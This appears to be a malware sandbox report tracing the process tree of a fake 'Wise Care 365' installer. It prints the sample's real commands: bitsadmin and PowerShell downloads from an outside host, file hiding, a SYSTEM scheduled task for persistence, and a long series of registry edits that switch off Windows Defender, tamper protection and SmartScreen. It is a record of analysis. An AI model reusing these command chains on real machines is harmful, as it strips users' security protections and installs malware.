Token: SeDebugPrivilege	2608	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	2608	kernel32.exe
Token: SeIncreaseQuotaPrivilege	2608	kernel32.exe
Token: 0	2608	kernel32.exe
Token: SeTcbPrivilege	4176	svchost.exe
Token: SeTcbPrivilege	4176	svchost.exe
Token: SeDebugPrivilege	4568	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	4568	kernel32.exe
Token: SeIncreaseQuotaPrivilege	4568	kernel32.exe
Token: SeDebugPrivilege	832	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	832	kernel32.exe
Token: SeIncreaseQuotaPrivilege	832	kernel32.exe
Token: 0	832	kernel32.exe
Token: SeDebugPrivilege	3496	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	3496	kernel32.exe
Token: SeIncreaseQuotaPrivilege	3496	kernel32.exe
Token: SeDebugPrivilege	3652	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	3652	kernel32.exe
Token: SeIncreaseQuotaPrivilege	3652	kernel32.exe
Token: 0	3652	kernel32.exe
Token: SeDebugPrivilege	1256	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	1256	kernel32.exe
Token: SeIncreaseQuotaPrivilege	1256	kernel32.exe
Token: SeDebugPrivilege	5112	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	5112	kernel32.exe
Token: SeIncreaseQuotaPrivilege	5112	kernel32.exe
Token: 0	5112	kernel32.exe
Token: SeDebugPrivilege	1312	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	1312	kernel32.exe
Token: SeIncreaseQuotaPrivilege	1312	kernel32.exe
Token: SeDebugPrivilege	4740	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	4740	kernel32.exe
Token: SeIncreaseQuotaPrivilege	4740	kernel32.exe
Token: 0	4740	kernel32.exe
Token: SeDebugPrivilege	5020	DllHost.exe
Token: SeAssignPrimaryTokenPrivilege	5020	DllHost.exe
Token: SeIncreaseQuotaPrivilege	5020	DllHost.exe
Token: SeDebugPrivilege	4480	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	4480	kernel32.exe
Token: SeIncreaseQuotaPrivilege	4480	kernel32.exe
Token: 0	4480	kernel32.exe
Token: SeDebugPrivilege	3476	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	3476	kernel32.exe
Token: SeIncreaseQuotaPrivilege	3476	kernel32.exe
Token: SeDebugPrivilege	3604	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	3604	kernel32.exe
Token: SeIncreaseQuotaPrivilege	3604	kernel32.exe
Token: 0	3604	kernel32.exe
Token: SeDebugPrivilege	2044	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	2044	kernel32.exe
Token: SeIncreaseQuotaPrivilege	2044	kernel32.exe
Token: SeDebugPrivilege	2088	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	2088	kernel32.exe
Token: SeIncreaseQuotaPrivilege	2088	kernel32.exe
Token: 0	2088	kernel32.exe
Token: SeDebugPrivilege	3372	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	3372	kernel32.exe
Token: SeIncreaseQuotaPrivilege	3372	kernel32.exe
Token: SeDebugPrivilege	4704	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	4704	kernel32.exe
Token: SeIncreaseQuotaPrivilege	4704	kernel32.exe
Token: 0	4704	kernel32.exe
Token: SeDebugPrivilege	4572	kernel32.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

aad0024d7c30bf6fee7c90d90371ca14.tmp

pid process

2944 aad0024d7c30bf6fee7c90d90371ca14.tmp
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

Wise Care 365 5.9.1.582.tmp

pid process

4780 Wise Care 365 5.9.1.582.tmp
4780 Wise Care 365 5.9.1.582.tmp
4780 Wise Care 365 5.9.1.582.tmp

pid	process
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp
4780	Wise Care 365 5.9.1.582.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

aad0024d7c30bf6fee7c90d90371ca14.exeaad0024d7c30bf6fee7c90d90371ca14.tmpcmd.execmd.exeWScript.execmd.exe

description	pid	process	target process
PID 2864 wrote to memory of 2944	2864	aad0024d7c30bf6fee7c90d90371ca14.exe	aad0024d7c30bf6fee7c90d90371ca14.tmp
PID 2864 wrote to memory of 2944	2864	aad0024d7c30bf6fee7c90d90371ca14.exe	aad0024d7c30bf6fee7c90d90371ca14.tmp
PID 2864 wrote to memory of 2944	2864	aad0024d7c30bf6fee7c90d90371ca14.exe	aad0024d7c30bf6fee7c90d90371ca14.tmp
PID 2944 wrote to memory of 1076	2944	aad0024d7c30bf6fee7c90d90371ca14.tmp	cmd.exe
PID 2944 wrote to memory of 1076	2944	aad0024d7c30bf6fee7c90d90371ca14.tmp	cmd.exe
PID 2944 wrote to memory of 1076	2944	aad0024d7c30bf6fee7c90d90371ca14.tmp	cmd.exe
PID 2944 wrote to memory of 1772	2944	aad0024d7c30bf6fee7c90d90371ca14.tmp	cmd.exe
PID 2944 wrote to memory of 1772	2944	aad0024d7c30bf6fee7c90d90371ca14.tmp	cmd.exe
PID 2944 wrote to memory of 1772	2944	aad0024d7c30bf6fee7c90d90371ca14.tmp	cmd.exe
PID 1772 wrote to memory of 3772	1772	cmd.exe	powershell.exe
PID 1772 wrote to memory of 3772	1772	cmd.exe	powershell.exe
PID 1772 wrote to memory of 3772	1772	cmd.exe	powershell.exe
PID 1076 wrote to memory of 2268	1076	cmd.exe	bitsadmin.exe
PID 1076 wrote to memory of 2268	1076	cmd.exe	bitsadmin.exe
PID 1076 wrote to memory of 2268	1076	cmd.exe	bitsadmin.exe
PID 1076 wrote to memory of 640	1076	cmd.exe	bitsadmin.exe
PID 1076 wrote to memory of 640	1076	cmd.exe	bitsadmin.exe
PID 1076 wrote to memory of 640	1076	cmd.exe	bitsadmin.exe
PID 1772 wrote to memory of 320	1772	cmd.exe	7za.exe
PID 1772 wrote to memory of 320	1772	cmd.exe	7za.exe
PID 1772 wrote to memory of 320	1772	cmd.exe	7za.exe
PID 1772 wrote to memory of 2248	1772	cmd.exe	WScript.exe
PID 1772 wrote to memory of 2248	1772	cmd.exe	WScript.exe
PID 1772 wrote to memory of 2248	1772	cmd.exe	WScript.exe
PID 1772 wrote to memory of 1896	1772	cmd.exe	timeout.exe
PID 1772 wrote to memory of 1896	1772	cmd.exe	timeout.exe
PID 1772 wrote to memory of 1896	1772	cmd.exe	timeout.exe
PID 2248 wrote to memory of 1000	2248	WScript.exe	cmd.exe
PID 2248 wrote to memory of 1000	2248	WScript.exe	cmd.exe
PID 2248 wrote to memory of 1000	2248	WScript.exe	cmd.exe
PID 1000 wrote to memory of 2964	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 2964	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 2964	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 4828	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 4828	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 4828	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 1992	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 1992	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 1992	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 768	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 768	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 768	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 3364	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 3364	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 3364	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 536	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 536	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 536	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 2136	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 2136	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 2136	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 3336	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 3336	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 3336	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 4824	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 4824	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 4824	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 1384	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 1384	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 1384	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 4148	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 4148	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 4148	1000	cmd.exe	reg.exe
PID 1000 wrote to memory of 2660	1000	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

4728 attrib.exe

pid	process
4728	attrib.exe

C:\Users\Admin\AppData\Local\Temp\aad0024d7c30bf6fee7c90d90371ca14.exe
"C:\Users\Admin\AppData\Local\Temp\aad0024d7c30bf6fee7c90d90371ca14.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2864

C:\Users\Admin\AppData\Local\Temp\is-BKVH8.tmp\aad0024d7c30bf6fee7c90d90371ca14.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BKVH8.tmp\aad0024d7c30bf6fee7c90d90371ca14.tmp" /SL5="$9003A,38098121,731648,C:\Users\Admin\AppData\Local\Temp\aad0024d7c30bf6fee7c90d90371ca14.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:1076

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/Telemetry.xml C:\Users\Admin\AppData\Local\Temp\Telemetry.xml
4⤵
- Download via BitsAdmin
PID:2268

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/wlanext32.exe C:\Users\Admin\AppData\Local\Temp\wlanext32.exe
4⤵
- Download via BitsAdmin
PID:640

C:\Windows\SysWOW64\xcopy.exe
xcopy /y "C:\Users\Admin\AppData\Local\Temp\wlanext32.exe" "C:\ProgramData\Local\Microsoft\Windows\Telemetry\"
4⤵
- Enumerates system info in registry
PID:2448

C:\Windows\SysWOW64\xcopy.exe
xcopy /y "C:\Users\Admin\AppData\Local\Temp\Telemetry.xml" "C:\ProgramData\Local\Microsoft\Windows\Telemetry\"
4⤵
- Enumerates system info in registry
PID:3180

C:\Windows\SysWOW64\attrib.exe
ATTRIB +H C:\ProgramData\Local\Microsoft\Windows\Telemetry\*.*
4⤵
- Views/modifies file attributes
PID:4728

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /RU SYSTEM /TN "Telemetry update-S-1-5-21-3460174932" /XML "C:\ProgramData\Local\Microsoft\Windows\Telemetry\Telemetry.xml"
4⤵
- Creates scheduled task(s)
PID:3552

C:\Windows\SysWOW64\PING.EXE
Ping -n 3 127.0.0.1
4⤵
PID:4284

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:3364

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:5016

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2832

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2556

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:4532

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3384

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2760

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:4208

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:5004

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1040

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2772

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:4448

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3708

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2100

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:3900

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Runs ping.exe
PID:3992

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2616

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:5080

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1776

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:4156

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2188

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:5044

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:3680

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:216

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:4260

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Runs ping.exe
PID:2012

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:3092

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3284

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:3540

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2212

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2980

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:4608

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1652

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2832

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3936

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:4828

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2332

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2348

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3224

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3536

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3384

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:456

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:4944

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2044

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:4148

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1000

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1500

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2676

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:4640

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2604

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Runs ping.exe
PID:2136

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:4616

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:4204

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:4320

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:4532

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1272

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1656

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:644

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:3276

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:4876

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:3708

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2100

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:3900

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3992

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2616

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:4740

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1776

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:4156

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2532

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:4628

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:4228

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2328

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2004

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3088

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2576

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:4004

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:212

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:876

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2372

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1552

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1384

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:4904

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:4748

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2464

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3240

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2568

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2260

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:4412

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:4556

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:4952

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3552

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:4592

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2608

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:5024

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:4584

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:4936

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:4444

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:4208

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2648

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:4372

C:\Windows\SysWOW64\PING.EXE
Ping -n 3 127.0.0.1
4⤵
PID:1040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\main.bat" "
3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1772

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thddghdd3.com/hfile.bin', 'hfile.bin')"
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3772

C:\ProgramData\ConsoleApp\7za.exe
7za.exe x -y -p1r7d2kvUf3 "*.7z"
4⤵
- Executes dropped EXE
PID:320

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\ConsoleApp\ControlSet003.vbs"
4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2248

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet001.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:1000

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
6⤵
PID:2964

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
6⤵
PID:4828

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
6⤵
PID:1992

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
6⤵
PID:768

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
6⤵
PID:3364

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
6⤵
PID:536

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
6⤵
PID:2136

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
6⤵
PID:3336

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
6⤵
PID:4824

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
6⤵
PID:1384

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
6⤵
PID:4148

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
6⤵
PID:2660

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
6⤵
PID:3196

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
6⤵
PID:4856

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
6⤵
PID:5024

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
6⤵
PID:4780

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
6⤵
PID:4728

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
6⤵
PID:440

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
6⤵
PID:3432

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:4636

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
6⤵
PID:4176

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
6⤵
PID:4200

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
6⤵
PID:4548

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
6⤵
PID:4340

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
6⤵
PID:1664

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
6⤵
PID:2968

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
6⤵
PID:2304

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
6⤵
PID:3216

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
6⤵
PID:2364

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
6⤵
PID:1084

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
